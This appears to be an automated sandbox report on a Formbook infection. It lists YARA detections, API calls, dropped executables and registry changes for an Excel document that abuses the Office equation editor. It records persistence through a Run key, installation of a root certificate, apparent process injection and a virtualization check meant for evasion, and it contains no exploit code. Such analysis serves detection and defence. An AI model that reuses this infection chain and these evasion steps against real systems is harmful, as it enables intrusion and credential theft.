      Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Office equation editor drops PE fileShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000007.00000002.705537729.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000002.698473567.00000000042CF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000008.00000000.658169980.00000000042CF000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000007.00000000.633264807.0000000072480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: C:\Users\Public\Libraries\hpvdsxZ.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249BABE
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_72481030
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249C130
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249C9A5
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_72482FB0
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_72488C7B
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249C4E6
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_72488C80
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_72482D87
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_72482D90
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02641238
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0259E2E9
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025A7353
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025EA37B
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025A2305
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025C63DB
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0259F3CF
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025B905A
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025A3040
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025CD005
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0259E0C6
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02642622
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025AE6C1
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025A4680
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025D57C3
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025AC7BC
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0262579A
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025DD47D
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025B1489
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025D5485
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025E6540
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025A351F
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025BC5F0
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02653A83
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025C7B00
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0259FBD7
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0262DBDA
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0264CBA4
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025AC85C
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025C286D
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0263F8EE
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02625955
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025B69FE
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025A29B2
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0264098E
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025BEE4C
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025D2E2F
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025CDF7C
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025B0F3F
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00460A1C
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0043D6C0
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0049F758
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0045B7EC
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: String function: 0260F970 appears 75 times
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: String function: 0259DF5C appears 108 times
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: String function: 0259E2A8 appears 33 times
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: String function: 025E3F92 appears 87 times
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: String function: 025E373B appears 213 times
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: String function: 004043D8 appears 71 times
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: String function: 00406B94 appears 61 times
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_72498690 NtReadFile,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_72498710 NtClose,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_724987C0 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_724985E0 NtCreateFile,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_724987C2 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02590048 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025900C4 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025907AC NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FAE8 NtQueryInformationProcess,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FB68 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FBB8 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258F9F0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FFB4 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FC60 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FDC0 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02590078 NtResumeThread,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02590060 NtQuerySection,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025910D0 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02591148 NtOpenThread,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0259010C NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_025901D4 NtSetValueKey,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FA50 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FA20 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FAB8 NtQueryValueKey,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FB50 NtCreateKey,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FBE8 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258F8CC NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258F900 NtReadFile,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258F938 NtWriteFile,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02591930 NtSetContextThread,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FE24 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FEA0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FF34 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FFFC NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FC48 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_02590C40 NtGetContextThread,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FC30 NtOpenProcess,
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0258FC90 NtUnmapViewOfSection,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00466610 NtdllDefWindowProc_A,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0044AFA4 NtdllDefWindowProc_A,GetCapture,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00466DB4 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00466E64 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0045B7EC GetSubMenu,SaveDC,RestoreDC,GetWindowDC,SaveDC,RestoreDC,NtdllDefWindowProc_A,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0043D9D0 NtdllDefWindowProc_A,
      Source: vbc.exe.2.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
      Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
      Source: Zxsdvph.exe.4.drStatic PE information: Resource name: RT_STRING type: COM executable for DOS
      Source: vbc.exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: vbc[1].exe.2.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: Zxsdvph.exe.4.drStatic PE information: Resource name: RT_BITMAP type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\Public\vbc.exeSection loaded: msmpcom.dll
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeSection loaded: msmpcom.dll
      Source: C:\Users\Public\vbc.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 72480000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 72480000 page execute and read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 72480000 page no access
      Source: C:\Users\Public\vbc.exeMemory allocated: 72480000 page read and write
      Source: C:\Users\Public\vbc.exeMemory allocated: 72481000 page read and write
      Source: C:\Windows\SysWOW64\DpiScaling.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Windows\SysWOW64\DpiScaling.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeMemory allocated: 76F90000 page execute and read and write
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeMemory allocated: 76E90000 page execute and read and write
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe 'C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe 'C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exe'
      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Swift.xlsxJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRF028.tmpJump to behavior
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@8/21@6/1
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_004709EC CoCreateInstance,
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0049FF2C EntryPoint,GetDiskFreeSpaceExA,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0042982C GetLastError,FormatMessageA,
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\Public\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0041C244 FindResourceA,
      Source: explorer.exe, 00000008.00000002.696039794.0000000002AE0000.00000002.00020000.sdmpBinary or memory string: .VBPud<_
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\Public\vbc.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wntdll.pdb source: DpiScaling.exe
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249A3BA pushfd ; ret
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249B83B push eax; ret
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249B832 push eax; ret
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249B89C push eax; ret
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_72486907 push 00000060h; retf
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249A11B push ecx; ret
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_72499E43 push 0000007Eh; iretd
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7248EFC6 push cs; ret
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_7249B7E5 push eax; ret
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_724954EE pushad ; retf
      Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0259DFA1 push ecx; ret
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00452658 push 004526E5h; ret
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0046A054 push ecx; mov dword ptr [esp], ecx
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00434010 push 0043405Ch; ret
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_004540CC push 004540F8h; ret
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0047208C push 004720B8h; ret
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0041A0AC push eax; iretd
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0041A19C push eax; iretd
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00426248 push 004262F3h; ret
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0041A250 push eax; iretd
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0047223C push ecx; mov dword ptr [esp], edx
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0048C2F0 push 0048C31Ch; ret
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_004262F8 push 00426388h; ret
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0045C2A4 push 0045C30Fh; ret
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_004402A0 push 004402F9h; ret
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0041A34C push eax; iretd
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0044033C push 00440374h; ret
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_004403D0 push 004403FCh; ret
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0043C3EC push 0043C418h; ret
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00416450 push ecx; mov dword ptr [esp], eax
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0043C45C push 0043C488h; ret
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0045200C SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Users\Public\vbc.exeFile created: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeJump to dropped file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

      Boot Survival:

      barindex
      Drops PE files to the user root directoryShow sources
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
      Source: C:\Users\Public\vbc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ZxsdvphJump to behavior
      Source: C:\Users\Public\vbc.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run ZxsdvphJump to behavior
      Source: C:\Users\Public\vbc.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00466698 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0044C6C8 IsIconic,GetCapture,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00466DB4 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_00466E64 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0044CF7C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_004635DC SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0044D8A0 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0042FFC4 IsIconic,GetWindowPlacement,GetWindowRect,
      Source: C:\Users\Public\Libraries\Zxsdvph\Zxsdvph.exeCode function: 9_2_0045200C SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to detect virtualization through RDTSC time measurementsShow sources
